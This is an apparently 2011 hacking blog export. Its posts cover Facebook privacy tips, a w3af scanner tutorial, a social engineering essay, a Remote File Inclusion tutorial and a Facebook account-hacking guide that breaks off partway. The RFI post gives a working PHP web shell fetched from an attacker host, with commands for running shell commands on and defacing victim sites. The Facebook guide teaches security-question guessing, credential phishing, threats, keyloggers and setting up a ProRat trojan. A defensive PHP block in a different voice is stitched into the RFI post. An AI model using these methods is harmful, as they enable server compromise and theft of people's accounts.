disable everything for those who are not in your friends list, because there is a chance that someone is watching your activities.<br /><br style="color: #073763;" /><span style="color: #073763;">Application Settings</span><br />Each Facebook application has default settings, and when you allow an application it means that you have signed an agreement: the developer of the application may watch all of your activities, may be able to get at your password, can update your status and more. So avoid applications as much as possible.<br /><br /><span style="color: #073763;">Account Security</span><br />It is good practice to add more than one email address to your profile and to connect your mobile phone to it, so that if you lose your account you are able to prove that you are its owner.<br /><br /><span style="color: #073763;">More Tips</span><br style="color: #073763;" /><br /> Never share your password with anyone.<br /> Disable your browser from saving your password.<br /> Avoid signing in to your account when you are in a public place.<br /> If you are using a wireless LAN (WLAN), keep Firesheep in mind. </b></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com0tag:blogger.com,1999:blog-3299468824600484367.post-66869504341949614212011-09-28T06:08:00.000-07:002011-09-28T06:08:37.573-07:00Web Application Attack and Audit Framework (W3AF)- Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB8_C1oKrTm_BJxX3qwGPNCLbfHEnGLtZBO1kn1sLOn1C-tNa9pE5oDbmCMX0E-jD8bpVUhkwRIS6a1ePi3q-L5lnfrvp5RKg3WnIRHNoSDWQW7QdxHRDMidQY4nZL2m_4XM6zSG5MaAk/s1600/waf.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiB8_C1oKrTm_BJxX3qwGPNCLbfHEnGLtZBO1kn1sLOn1C-tNa9pE5oDbmCMX0E-jD8bpVUhkwRIS6a1ePi3q-L5lnfrvp5RKg3WnIRHNoSDWQW7QdxHRDMidQY4nZL2m_4XM6zSG5MaAk/s320/waf.jpeg" width="320" /></a></div>
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<span style="font-size: small;"><b><br />Security is a key point for every effective business: whether you are running your own website or your job is to manage the web application for your company, you have to do a little penetration testing to check the security of the web application.<br />Nowadays exploits are available, and updated on a daily basis, for many different web application services.<br /><br />While doing a penetration test, a pen tester must consider these exploits for the different vulnerabilities.<br />Finding vulnerabilities is not enough; a pen tester must also check the exploits that are publicly available for the different services.<br /><br />w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. w3af aims to become the best open source web application exploitation framework. It provides information about security vulnerabilities and aids in penetration testing efforts.<br /><br />An important fact about w3af is that it is available for all major operating systems, such as Microsoft Windows, Linux, Mac OS, FreeBSD and OpenBSD. It is written in the Python programming language and provides both a command line interface and a graphical user interface.<br /><br />w3af uses more than 130 plugins to find vulnerabilities in web applications. Vulnerabilities it finds, such as SQL injection, OS commanding, remote file inclusion (PHP), cross-site scripting (XSS) and unsafe file uploads, can then be exploited in order to gain different types of access to the remote system.<br /><br />Tutorial<br />Once you have all the prerequisites, you can start w3af as follows:<br />$ ./w3af<br />w3af>>><br /><br />Typing help will give you a list of options.<br /><br />w3af>>> help<br />The following commands are available:<br /><br />help You are here. help [command] prints more specific help.<br />url-settings Configure the URL opener.<br />misc-settings Configure w3af misc settings.<br />session Load and save sessions.<br />plugins Enable, disable and configure plugins.<br />start Start site analysis.<br />exploit Exploit a vulnerability.<br />tools Enter the tools section.<br />target Set the target URL.<br />exit Exit w3af.<br /><br />w3af>>><br />Now see this example:<br /><br />w3af/plugins>>> audit xss<br />w3af/plugins>>> audit<br />Enabled audit plugins:<br />xss<br />w3af/plugins>>> discovery webSpider,pykto,hmap<br />w3af/plugins>>> discovery<br />Enabled discovery plugins:<br />webSpider<br />pykto<br />w3af/plugins>>> output console,htmlFile<br />w3af/plugins>>> output<br />Enabled output plugins:<br />htmlFile<br />console<br />w3af/plugins>>> output config htmlFile<br />w3af/plugin/htmlFile>>> view</b></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com2tag:blogger.com,1999:blog-3299468824600484367.post-13062286699178881812011-09-20T05:29:00.000-07:002011-09-20T05:33:08.779-07:00Social Engineering<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="color: #666666; font-family: Arial,Helvetica,sans-serif;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0m-2JOm6woKcIRwMRwKtk78RKF3x9QqS1XHeI-5W3B2icJ9yi6pz8eWu09_fVwYLrGouaddwC_XzBARhAGzxI_KMvHcMpIXEApJvXdeDtVlbe1HZvhS6xgDwJ6Cik4eBlax2ObkIoI8U/s1600/chalkboard.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0m-2JOm6woKcIRwMRwKtk78RKF3x9QqS1XHeI-5W3B2icJ9yi6pz8eWu09_fVwYLrGouaddwC_XzBARhAGzxI_KMvHcMpIXEApJvXdeDtVlbe1HZvhS6xgDwJ6Cik4eBlax2ObkIoI8U/s320/chalkboard.jpg" width="320" /></a></div>
<span style="font-size: small;"><b><br />Why use Social Engineering?<br /><br />The reasons for using social engineering to gain access are simple: once mastered, social engineering can be used on a system despite the platform or the quality of the hardware and software present. Social engineering comes in many forms, but they are all based on the principle of disguising oneself as a non-hacker who needs or deserves the information to gain access to the system. Aside from user larger security systems, another tactic that security professionals employ is 'security through obscurity,' which is providing little or no information to a user, assuming that legitimate users have already been trained, and that the hackers would be discouraged by having to guess different commands or procedures. Security through obscurity methods can also be accomplished by hiding certain files or information systems or having confusing login prompts. This method of security is completely undermined when social engineering is involved. With a legitimate human user providing information, all the information that allowed for security through obscurity would also be divulged to the hacker.<br /><br />Methods of Attack?<br /><br />Although the methods used by social engineers rely on the same principle, the disguises of the hackers may vary greatly, depending on the hacker's level of skill and the type of information he or she is after. One common method used is for the attacker to pretend he is new to the system and needs assistance with gaining access. The role as a new person (or 'newbie' or 'neophyte') is easy for a potential hacker to pull off. The hacker can easily pretend to not know much about a system and still retrieve information. This ruse is commonly used when the attacker is unable to research enough about the company or find enough information to get a foot in the door. 
A simple method of this technique is for the hacker to call a secretary for the company and pretend that he is a new temp agent and is having trouble gaining access into the system. The secretary (or other legitimate user) may be inclined and proud to be able to offer help to the new person on the job. The user may simply give out the guest account name and password, or may even go into detailed instructions on login procedures for different departments. Once the intruder is in a guest account however, he may be able to access other (more important) accounts from there. He may also be able to find out enough information about the company to use a similar tactic: reverse social engineering, which is covered in the next section.<br /><br />Other guises used by social engineers are to pose as a computer aide or helper, and try to gain information as you fix the computer. This technique, however, relies on the assumption that there is something wrong with the computer system. By posing as a helper, the legitimate user will be less suspicious and more willing to answer your inquisitive questions. Another form for the attacker to take is that of a system operator for the network itself. The potential hacker will pretend that an error in all the accounts has been made, and the he needs to reset the accounts. In order to do that, he needs the old passwords of the users. If the employee is naive enough, he or she will divulge the information, thinking that they are doing their company a service. Although there are many other methods and techniques, these previous examples account for most recorded incidents of social engineers.<br /><br />The disguises and tricks that the hackers use to social engineer legitimate users do have limits, however. During a social engineering attack, the hacker assumes a great deal and also relies on luck to pull off a successful hack. 
The above examples usually only work on employees who are not aware of the different forms of social engineering, or that they don't care about the company's security. Even if an employee is not aware of social engineering, he or she may not trust who the hacker is without proper identification. The employee may also be aware that temp agents usually have contact managers or other people within their own office to assist them, and would be suspicious when the call comes to their desk. These problems are a constant danger to the potential hacker, which has called for a new type of social engineering- called reverse social engineering.<br /><br />Reverse Social Engineering<br /><br />Reverse social engineering is a superior form of social engineering that deals with the common difficulties that come with normal social engineering. This form can be described as a legitimate user of a system asking the hacker questions for information. In reverse social engineering (RSE), the hacker is thought to be a higher-level that the legitimate user, who is actually a target. In order to pull of an RSE attack, however, the attacker must be knowledgeable of the system and usually must also have previous access granted to him, usually through normal social engineering. 
A quick glance of the some pros and cons of SE and RSE are given here:<br /><br />Social Engineering: The hacker places the calls and is dependent on the user<br />Reverse Social Engineering: The user places the calls and are dependent the hacker<br /><br />Social Engineering: The user feels that the hacker is indebted to them.<br />Reverse Social Engineering: The user feels indebted to the hacker.<br /><br />Social Engineering: Questions often remain unresolved to the victim.<br />Reverse Social Engineering: All the problems are corrected, no suspicious loose ends<br /><br />Social Engineering: The user has control by providing information.<br />Reverse Social Engineering: The hacker has complete control.<br /><br />Social Engineering: Little or no preparation required.<br />Reverse Social Engineering: Lots of planning and previous access usually needed<br /><br />The typical RSE attack consists of three major parts: sabotage, advertising, and assisting. After gaining simple access through other means, the hacker sabotages a workstation by either corrupting the station, or giving the appearance that it is corrupted. An abundance of error messages, switched parameters/options, or simulation programs such as fake prompts can accomplish this type of sabotage. The user of the system sees the malfunctions, and then tries to seek help. In order to be the one that the users call, the attacker must advertise that he or she is capable of fixing the problem. Advertising may include placing fake business cards around the office or even providing the number to call in the error message itself. A sample error message might be:<br /><br />** ERROR 03 - Restricted Access Denied ** - File access not allowed by user. Consult with Mr. Crack at () 595-1474 for file permission information.<br /><br />In this case, the user would call 'Mr. Downs' for help, and divulge account information without being suspicious of the legitimacy of 'Mr. Downs.' 
Another method of advertisement can actually involve social engineering. An example of this is for the hacker to call the target and inform them that the technical support number has changed, and then give them their own number. The third (and easiest) part of an RSE attack is for the hacker to assist with the problem. Since the hacker is the instigator of the sabotage, the problem is easily fixed, and the target is not suspicious of the helper since he or she appears to be a knowledgeable user of the system. The duty of the hacker is only to get account information out of the target while helping them. After the information is obtained, the hacker solves the problem and then ends the conversation, eager to use his newfound knowledge.<br /><br />Why Social Engineering Works<br /><br />The use of social engineering and reverse social engineering is common because they often work under good conditions and take less time (and sometimes less knowledge) to pull off than brute-force attacks. They work because all humans have certain psychological characteristics that can be taken advantage of. Such characteristics are diffusion of responsibility, ingratiation opportunities, and moral duty. Diffusion of responsibility is used when the legitimate user feels that he or she is not solely responsible for their actions, which allows them to give up information more easily. A user may also divulge information if they feel that they are doing something that will help them in the future, such as getting their boss out of a jam. Moral duty is played on when the target believes that they are helping the company with a problem, and they are often glad to help. 
There are other factors that allow social engineers to be successful, such as the use of guilt and personal persuasion.<br /><br />Methods of Prevention<br /><br />As social engineering and reverse social engineering become more prevalent, companies and network managers are trying to stop the attacks from being successful. Companies concerned with security realize that the great amounts of money spent on upgrades and security kits are being wasted if they can't prevent SE and RSE attacks. The simple answer to preventing these attacks is education. A knowledgeable user of a system can easily be told to never give out account information without permission of a supervisor. The users should be aware of the common methods of SE attacks, and should always report suspicious behavior. While catching on to RSE attacks is much harder, the users should still be aware of who to trust when a problem occurs. Since social engineers can attack any employee for information, all employees should be concerned with methods of attack. Hackers know that low-level employees and users with low company morale are easy targets for giving up information without much thought. These employees must learn to care about computer and company security as a whole.<br /><br />Conclusion<br /><br />All computer systems in the world must rely on human operators that have vulnerable characteristics. No matter how secure the equipment is from electronic invasion, the knowledge extracted from a legitimate user may render a computer network inoperable if used in an unauthorized manner. Hackers try to learn how to manipulate legitimate users into providing valuable network information. Once in, they may even use reverse social engineering to gain further access to the system. This golden method of hacking is easily prevented by educating the users to be aware of such attacks, and to use wise judgment when providing others with company information.<br /><br /></b></span></div>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com1tag:blogger.com,1999:blog-3299468824600484367.post-67206122970369293272011-09-10T06:22:00.000-07:002011-09-20T05:18:21.774-07:00Remote File Inclusion (RFI)<div dir="ltr" style="text-align: left;" trbidi="on">
RFI stands for Remote File Inclusion, and it allows the attacker to
make a website or server include and run a custom coded/malicious file hosted
elsewhere, through the site's own script. <img align="right" alt="A simple tutorial to Remote File Inclusion (RFI) - theprohack.com" border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKMn-IAdvMoII-H7MBR-GXYMr0WN0T6z0834RDVYUtokyyekU9239upgwmLW1lZgKWZ3RUECi_QmYYOv8C_XotoF3-3c25R2K6x2AZf7pkuhYr7oMLJpGjnP29HotbE-iwJwIGvZa4S9BT/?imgmax=800" style="border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; display: inline; margin-left: 0px; margin-right: 0px;" title="A simple tutorial to Remote File Inclusion (RFI) - theprohack.com" width="138" />The
vulnerability exploits poor validation checks in websites and can
eventually lead to code execution on the server or code execution on the website
(<em>XSS attack using javascript</em>). This time, I will be writing a
simple tutorial on Remote File Inclusion and by the end of the tutorial, I
suppose you will know what it is all about and may be able to deploy an
attack or two.<br />
RFI is a common vulnerability, and trust me, not all website <strong>hacking</strong>
is about SQL injection. Using RFI you can literally deface
websites, get access to the server and do almost anything (<em>including gagging them out or beg..well that's an exaggeration but I guess you get the idea</em>
:P ). What makes it more dangerous is that you only need your
common sense and basic knowledge of PHP to execute this one; some BASH
might come in handy as most servers today are hosted on <strong>Linux</strong>.<br />
Okay..Let's start..The first step is to find a vulnerable site..you can easily find them using <strong>Google</strong> dorks..If you don't have any idea, you might want to read about <strong>advanced password hacking using Google dorks</strong> or to <strong>use an automated tool to apply Google dorks</strong> using Google. Now let's assume we have found a vulnerable website<br />
<blockquote>
<a href="http://victimsite.com/index.php?page=home" rel="nofollow" target="_blank" title="Example of a victim site"><span style="font-family: Courier New;">http://victimsite.com/index.php?page=home</span></a><br />
</blockquote>
As
you can see, this website pulls documents stored in text format from the
server and renders them as web pages. We can find ways around it as it
uses the PHP include function to pull them out..check it out.<br />
<blockquote>
<a href="http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt" rel="nofollow" target="_blank" title="we upload our custom script here"><span style="font-family: Courier New;">http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt</span></a><br />
</blockquote>
I
have included a custom script “evilscript” in text format from my
website, which contains some code..Now..if it's a vulnerable website,
then one of 3 cases happens -<br />
<ul>
<li>Case 1 - You might have noticed
that the url consisting of “page=home” had no extension, but I have
included an extension in my url, hence the site may give an error like “<em>failure to include evilscript.txt.txt</em>”. This might happen as the site may be automatically adding the .txt extension to the pages stored on the server. </li>
<li>Case
2 - In case it automatically appends something along the lines of .php,
then we have to use a null byte “%00” in order to avoid the error. </li>
<li>Case 3 – successful execution :) </li>
</ul>
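What the three cases above have in common is that whatever arrives in the page parameter reaches PHP's include() unchecked. The following is an added example, not code from the original post or its author: it shows that vulnerable pattern next to a hardened replacement that resolves the request against an allow-list, so neither a remote URL, a traversal path nor a null-byte trick ever gets near the filesystem. The pages/ directory, the page names and the function names are assumptions made for the demo.

```php
<?php
// Added example, not code from the original post: the unchecked include()
// that the tutorial above abuses, beside a hardened replacement.
// The pages/ directory, the page names and the function names are assumptions.

// --- Vulnerable form (do not deploy): the request parameter goes straight to include().
// With allow_url_include=On, ?page=http://hackersite.com/evilscript.txt is fetched
// and executed; the appended ".txt" is the behaviour behind case 1 above.
function render_page_vulnerable($page): void
{
    include $page . '.txt';
}

// --- Hardened form: only an allow-listed page name ever reaches the filesystem.
const ALLOWED_PAGES = ['home', 'about', 'contact'];   // constructed allow-list
const PAGES_DIR = __DIR__ . '/pages';                  // assumed layout

function resolve_page($page, string $dir = PAGES_DIR): ?string
{
    // A page name is a short token: no scheme, no slash, no dot, no null byte.
    // "http://..." (RFI), "../../etc/passwd" (LFI) and "home%00" (case 2 above)
    // are all rejected here, before any path is built.
    if (!is_string($page) || !preg_match('/\A[a-z0-9_-]{1,32}\z/', $page)) {
        return null;
    }
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    // Belt and braces: the resolved file must exist and sit inside $dir.
    $path = realpath($dir . '/' . $page . '.txt');
    $base = realpath($dir);
    if ($path === false || $base === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_page_hardened($page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    // The pages are plain text, so print them escaped instead of include()-ing them:
    // include() would execute any PHP that ended up inside pages/.
    echo htmlspecialchars(file_get_contents($path), ENT_QUOTES, 'UTF-8');
}

if (PHP_SAPI === 'cli') {
    // Constructed fixture for a dry run: a throwaway pages/ dir with one real page.
    $dir = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
    mkdir($dir);
    file_put_contents($dir . '/home.txt', "Welcome home\n");
    $probes = ['home', 'about', 'http://hackersite.com/evilscript.txt', "home\0", '../../etc/passwd'];
    foreach ($probes as $probe) {
        $verdict = resolve_page($probe, $dir) === null ? 'rejected' : 'allowed';
        printf("%-40s -> %s\n", addcslashes($probe, "\0..\37"), $verdict);
    }
    unlink($dir . '/home.txt');
    rmdir($dir);
} else {
    render_page_hardened($_GET['page'] ?? null);
}
```

Run it from the command line (php rfi_demo.php) and only "home" is allowed; "about" is on the allow-list but has no file in the fixture, so the realpath check rejects it, and the three attack-shaped inputs are rejected by the token pattern before a path is even built. Note that allow_url_include has defaulted to Off since PHP 5.2 and PHP 5.3.4 and later refuse null bytes in filesystem paths, which is why cases 2 and 3 above fail on a current, default-configured server; neither setting replaces the allow-list, because local inclusion of files the attacker can write to (upload directories, logs) still goes through the same include().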
Now,
once you have battled through this one, you might want to learn what to
code inside the script. You may get a custom coded infamous C99 script (<em>too bloated but highly effective once deployed</em>) or you might code yourself a new one. For this, knowledge of PHP might come in handy. Here we go<br />
<blockquote>
<span style="font-family: Courier New;"><?php </span><br />
<span style="font-family: Courier New;">echo "<script>alert(U 4r3 0wn3d !!);</script>"; <br />echo "Run command: ".htmlspecialchars($_GET['cmd']); </span><br />
<span style="font-family: Courier New;">system($_GET['cmd']);</span><br />
<span style="font-family: Courier New;">?> </span><br />
</blockquote>
The
above code lets you exploit the include function and tests whether the site
is RFI (XSS) vulnerable by running the alert box code; if
successful, you can send custom commands to the Linux server in bash.
So…if you are in luck and it worked, let's try our hands on some Linux
commands. For example, to find the current working directory of the server
and then to list files, we will be using the “pwd” and “ls” commands.<br />
<blockquote>
<span style="font-family: Courier New;">http://victimsite.com/index.php?<strong>cmd=pwd</strong>&page=http://hackersite.com/ourscript</span><br />
<span style="font-family: Courier New;">http://victimsite.com/index.php?<strong>cmd=ls</strong>&page=http://hackersite.com/ourscript</span><br />
</blockquote>
What
it does is that it sends the command as the cmd parameter our script reads, and
begins to print the working directory and list the documents..Even
better..you can almost make the page proclaim that you hacked it by
using the “echo” command..<br />
<blockquote>
<span style="font-family: Courier New;">cmd=echo U r pwn3d by xero> index.php</span><br />
</blockquote>
It
will then re-write index.php and render it..In case it's a primitive
website which stores pages with a .txt extension, you might want to put
it alongside the .txt files. Now..as expected..we are now the alpha and
the omega of the website :) we can download, remove, rename, anything!
Want to download stuff? try the “wget” command (<em>cmd=wget.. get the idea..</em>)..Want to move it out? “mv”..<br />
I leave the rest to your creativity..<br />
<span style="font-weight:bold;"><a href="http://adf.ly/2exCt">COMPLETE HACKING IN ONE EBOOK DOWNLOAD NOW CERTIFIED ETHICAL COURSE FOR FREE </a></span>
</div>
Indian4994http://www.blogger.com/profile/14173641514901570881noreply@blogger.com5tag:blogger.com,1999:blog-3299468824600484367.post-44651677832094015772011-09-06T07:37:00.000-07:002011-09-06T07:37:44.697-07:00FACEBOOK HACKING COMPLETE GUIDE<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="http://www.bageltechnews.com/wp-content/uploads/2011/01/facebook_hack.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img alt="http://cdn3.digitaltrends.com/wp-content/uploads/2009/12/facebook-privacy1.jpg" src="http://cdn3.digitaltrends.com/wp-content/uploads/2009/12/facebook-privacy1.jpg" style="height: 155px; width: 206px;" /></a><br />
<div class="MsoNormal">
<span style="font-family: Calibri;">Hello guys, it's me, back with the latest post related to “<a href="http://www.devilscafe.co.cc/search/label/facebook">Facebook Hacking</a>”.</span></div>
<div class="MsoNormal">
<span style="font-family: Calibri;">Before
moving on I would give you a special NOTICE: in my blog I have posted
everything I have written, and if a post was not written by me then I
write the source from where I have copied it, so you can check it too.</span></div>
<div class="MsoNormal">
<span style="font-family: Calibri;">So if you copy this post from my blog <a href="http://www.devilscafe.co.cc/">http://www.devilscafe.co.cc/</a> then do write where you have copied it from.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Calibri;">So now let's move on to the topic.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b><span style="font-family: Calibri;">Facebook Hacking </span></b><span style="font-family: Calibri;">I
think most of you want to know how to hack a Facebook password, so in
this post I have posted everything you should know to hack someone’s
Facebook.</span></div>
<div class="MsoNormal">
<span style="font-family: Calibri;">I will first introduce you to some old-style hacking, and then to hardcore hacking.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Calibri;">First, the old and most common method of getting someone’s password</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 54pt; text-indent: -36pt;">
<span style="font-family: Calibri;">i)<span style="font: 7pt "Times New Roman";"> </span></span><b><span style="font-family: Calibri;">Primary mail</span></b><span style="font-family: Calibri;">-
You register your Facebook account from a primary mail like Yahoo,
Gmail, etc. If you get access to someone’s primary mail then you can
go to the Forgot your password link, get the confirmation code and access the
account.</span></div>
<div class="MsoNormal" style="margin-left: 54pt;">
<span style="font-family: Calibri;">But <b>how to get someone’s primary account’s password?</b><br />Don’t
worry about it, just do what I have told you: first go to
yahoo.com (or another email provider) and press the Forgot your password link;
there you will be asked some questions like Where were you born or
Where do you live. By guessing these you can get access to your
friend's account.</span></div>
<div class="MsoNormal" style="margin-left: 54pt;">
<br /></div>
<div class="MsoNormal" style="margin-left: 54pt;">
<br /></div>
<div class="MsoNormal" style="margin-left: 54pt; text-indent: -36pt;">
<b><span style="font-family: Calibri;">ii)<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span style="font-family: Calibri;">Social Engineering- </span></b><span style="font-family: Calibri;">I think many of you know what social engineering is. If you don’t know, do not worry, I am gonna explain it.<b><br /></b>Social
engineering is a process of manipulating someone by pretending that
you are someone else (like an IT officer) who needs their information for
certain research.<br />Here is an example of it:<br /><br /><b><i>Conversation between an Elite Hacker and a Newbie person (NooB)</i><br /><br />Elite Hacker : </b>Hi, I have good news for you<br /><b>Newbie : </b>What??<b><br />Elite Hacker :</b> Do you want to learn hacking in a few days?<br /><b><i>Newbie, now being excited</i><br />Newbie : </b>Yeah! Will you teach me?<br /><b>Elite Hacker : </b>No, I will post some of my hacking course videos (top secret) in your account, so give me your login details.<b><br /><i>Newbie, without thinking of anything, gives his Facebook details.<br /></i></b>This
is pretty much how someone can hack your Facebook by pretending. I
also used this process and hacked over 10+ accounts on my own.</span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="MsoNormal" style="margin-left: 54pt; text-indent: -36pt;">
<b><span style="font-family: Calibri;">iii)<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span style="font-family: Calibri;">Friendship Attack-</span></b><span style="font-family: Calibri;">
This is not a hacking process but I have included it to give a full
guide. OK, the friendship bomb is like cheating your friend. You can install
some programs on your friend's PC and then threaten him/her to give up
his/her password. It's kind of like an enemy attack.<br /></span></div>
<div class="MsoNormal" style="margin-left: 54pt; text-indent: -36pt;">
<b><span style="font-family: Calibri;">iv)<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span style="font-family: Calibri;">Garbage Dumping- </span></b><span style="font-family: Calibri;">There
are many people who use a long password and, to remember it, note that
password on paper and stick it somewhere, usually behind the
keyboard. Sometimes they accidentally throw<b> </b>that paper in the
garbage. To check this, some professional hackers (usually crackers)
search the garbage of the person’s house. It's not like WHO WILL DO
THIS KIND OF STUFF? but once you get the password or any sensitive
information then you might get employment in a garbage factory :P.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 54pt; text-indent: -36pt;">
<b><span style="font-family: Calibri;">v)<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span style="font-family: Calibri;">Hiring a Hacker- </span></b><span style="font-family: Calibri;">There
are many hackers who will crack someone’s password for you if you pay. You
can even find someone online (BUT NOT ME PLZ) and tell them to do it.<br />Now
you have to be careful doing this, because there are many sites that tell
you that they will crack a password for you for payment but all they are
doing is cheating you, so to confirm that they did hack the account
tell them to give you a screenshot of it, or to tell you what message you have
sent the user. This will keep you safe if the hacker is fooling you.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 54pt; text-indent: -36pt;">
<b><span style="font-family: Calibri;">vi)<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span style="font-family: Calibri;">Spam Hack-</span></b><span style="font-family: Calibri;">
Now this is more interesting. You may sometime have been spammed by
some application in Facebook. Some applications send messages like Look
how this girl killed herself after seeing this {link}; now when you
click on the link you too will be spammed. Some applications spam by
sending messages in chat and some in wall posts.<br />Now we are taking
this step to hack someone’s account. First create an application in
Facebook which spams the user by telling [you] hacked my account, praise
him. Here you means your name; for example, if I have put Arpit there
then it will say Arpit hacked my account, praise him. Now after seeing
this, people or your friends will think that I have hacked him/her and
people will gather around you. A neat way to cheat people ;).</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: 54pt; text-indent: -36pt;">
<b><span style="font-family: Calibri;">vii)<span style="font: 7pt "Times New Roman";"> </span></span></b><b><span style="font-family: Calibri;">JavaScript-</span></b><span style="font-family: Calibri;">
Now it's the turn of my favourite web programming language. If you think
JavaScript is useless then you are wrong. It's a very powerful language.<br />Now
this trick doesn’t hack your friend's password but makes your friend
look like they got hacked. You can get a complex JavaScript which will
display You got Owned. By telling your friends to put that code in
the browser’s address bar and press Enter, they will see a box with You
got Owned. It’s a good way to scare someone.<br /><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<b><span style="font-family: Calibri;">Now talking about some hardcore hacking \m/</span></b></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b><span style="font-family: Calibri;">i) Key logger-</span></b><span style="font-family: Calibri;"> A very common and much-used method for hacking someone’s Facebook account. You can download a key logger like Easy Logger.</span></div>
<div class="MsoNormal">
<span style="font-family: Calibri;">Download Easy Logger by searching on Google. Once you have downloaded Easy Logger, see the image below.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://file1.hpage.com/002715/46/bilder/finished1.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="http://file1.hpage.com/002715/46/bilder/finished1.jpg" width="320" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Calibri;">Don’t put your own Gmail account info in it, because if a hacker catches the keylogger then he can retrieve your password.</span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<b>ii) RATs-</b>
Now this is real hardcore. This article is not written by me. To
save time and deliver it to you quickly, I have copied it from The
Underground Hackers Handbook</div>
<div class="Default">
Begin-</div>
<div class="Default">
To show you an example of a malicious program, I will use a well known Windows Trojan, <u>ProRat</u>. </div>
<div class="Default">
1.
Download ProRat. Once it is downloaded right click on the folder and
choose to extract it. A password prompt will come up. The password will
be “<b>pro</b>”. </div>
<div class="Default">
2. Open up the program. You should see the following: </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMc_vB-4cr6LqI3y6nP7Hpr5zTUiopyqwZW_gP40aDmPaW_JIhDs0eUkV6qERsthjqcLD7swJO7xxm8EWz4zlLrHk-tdv1lHazaXnZccs9dLqrAkdAkzR_b70K4nPZUsj13wWYyMLkzr0/s1600/1.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMc_vB-4cr6LqI3y6nP7Hpr5zTUiopyqwZW_gP40aDmPaW_JIhDs0eUkV6qERsthjqcLD7swJO7xxm8EWz4zlLrHk-tdv1lHazaXnZccs9dLqrAkdAkzR_b70K4nPZUsj13wWYyMLkzr0/s320/1.bmp" width="320" /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<br /></div>
<div class="Default">
3. Next we will create the actual Trojan file. Click on <b>Create </b>and choose <b>Create ProRat Server</b>. </div>
<div class="Default">
<br /></div>
<div class="Default">
4.
Next put in your IP address so the server could connect to you. If you
don’t know your IP address click on the little arrow to have it filled
in for you automatically. Next put in your e-mail so that when and if a
victim gets infected it will send you a message. We will not be using
the rest of the options. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz21X-enwtfITrIbRzzaGaXjiFJ32eF-x64z2drueiiMcTym6tQVFnTNjkz_LOO_G6tFEOHsAGR-5w2a8OxZIICVeB9gYN3aE141hyphenhyphenvBzdBcxsX5HwXhtIHVMvhvHEKUzfWoB60Iv8iik/s1600/2.bmp" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz21X-enwtfITrIbRzzaGaXjiFJ32eF-x64z2drueiiMcTym6tQVFnTNjkz_LOO_G6tFEOHsAGR-5w2a8OxZIICVeB9gYN3aE141hyphenhyphenvBzdBcxsX5HwXhtIHVMvhvHEKUzfWoB60Iv8iik/s320/2.bmp" width="320" /></a></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<span style="font-family: Calibri;"><br /></span></div>
<div class="MsoNormal" style="margin-left: 18pt;">
<br /></div>
<div class="Default">
<br /></div>
<div class="Default">
5. Click on the <b>General Settings </b>button
to continue. Here we will choose the server port the program will
